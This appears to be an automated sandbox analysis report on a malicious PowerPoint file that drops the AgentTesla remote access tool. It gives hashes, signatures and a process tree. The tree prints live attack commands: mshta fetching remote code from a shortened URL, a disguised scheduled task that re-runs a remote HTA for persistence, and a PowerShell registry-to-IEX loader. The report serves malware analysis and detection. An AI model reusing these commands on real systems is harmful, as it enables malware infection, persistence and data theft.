Analysis

  • max time kernel
    143s
  • max time network
    149s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    22-04-2021 07:04

General

  • Target

    Remittance_PO-89488484.ppt

  • Size

    62KB

  • MD5

    b89f3f4467df6600138ba12eb1522f95

  • SHA1

    9d2567c6ebb4168b0670d4c00a7986de5c83a719

  • SHA256

    30969a11fe37f466bf5a9501d1c705e48a0073b725371062d9d9f889cc4b8156

  • SHA512

    3a127bd31192a8a7ee67c407887c62b40e1c113ff49a2cc1fae0ea6dd58198c60308ee13898f642d63deaf6ec561e52f15d396fd05f7f5fbf5c66ebdd0b58e55

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

https://j.mp/ghduiqhwdbiiqwgd

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

  • Process spawned unexpected child process 2 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • AgentTesla Payload 1 IoCs
  • Blocklisted process makes network request 13 IoCs
  • Drops file in Drivers directory 1 IoCs
  • Adds Run key to start application 2 TTPs 5 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 44 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" "C:\Users\Admin\AppData\Local\Temp\Remittance_PO-89488484.ppt" /ou ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:4020
    • C:\Windows\SYSTEM32\mshta.exe
      "mshta""https://j.mp/ghduiqhwdbiiqwgd"
      2⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Adds Run key to start application
      • Suspicious use of WriteProcessMemory
      PID:3828
      • C:\Windows\System32\schtasks.exe
        "C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 80 /tn ""WIND0WSUPLATE"" /F /tr ""\""mshta\""vbscript:Execute("\"CreateObject(""\""Wscript.Shell""\"").Run ""\""mshta http://1230948%[email protected]/p/razamana.html""\"", 0 : window.close"\")
        3⤵
        • Creates scheduled task(s)
        PID:2024
  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -noexit ((gp HKCU:\Software).MSOFFICELO)|IEX
    1⤵
    • Process spawned unexpected child process
    • Blocklisted process makes network request
    • Suspicious use of SetThreadContext
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:3884
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
      #cmd
      2⤵
      • Drops file in Drivers directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      PID:2184

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/2024-181-0x0000000000000000-mapping.dmp

  • memory/2184-187-0x00000000055E0000-0x0000000005ADE000-memory.dmp

    Filesize

    5.0MB

  • memory/2184-186-0x00000000004376BE-mapping.dmp

  • memory/3828-180-0x0000000000000000-mapping.dmp

  • memory/3884-185-0x0000016EC2BA8000-0x0000016EC2BA9000-memory.dmp

    Filesize

    4KB

  • memory/3884-184-0x0000016EC2BA6000-0x0000016EC2BA8000-memory.dmp

    Filesize

    8KB

  • memory/3884-183-0x0000016EC2BA3000-0x0000016EC2BA5000-memory.dmp

    Filesize

    8KB

  • memory/3884-182-0x0000016EC2BA0000-0x0000016EC2BA2000-memory.dmp

    Filesize

    8KB

  • memory/4020-118-0x00007FFA892C0000-0x00007FFA892D0000-memory.dmp

    Filesize

    64KB

  • memory/4020-179-0x00000272692B0000-0x00000272692B4000-memory.dmp

    Filesize

    16KB

  • memory/4020-123-0x00007FFAA3B80000-0x00007FFAA5A75000-memory.dmp

    Filesize

    31.0MB

  • memory/4020-122-0x000002725D760000-0x000002725E84E000-memory.dmp

    Filesize

    16.9MB

  • memory/4020-119-0x00007FFAAB2C0000-0x00007FFAACE9D000-memory.dmp

    Filesize

    27.9MB

  • memory/4020-114-0x00007FFA892C0000-0x00007FFA892D0000-memory.dmp

    Filesize

    64KB

  • memory/4020-117-0x00007FFA892C0000-0x00007FFA892D0000-memory.dmp

    Filesize

    64KB

  • memory/4020-116-0x00007FFA892C0000-0x00007FFA892D0000-memory.dmp

    Filesize

    64KB

  • memory/4020-115-0x00007FFA892C0000-0x00007FFA892D0000-memory.dmp

    Filesize

    64KB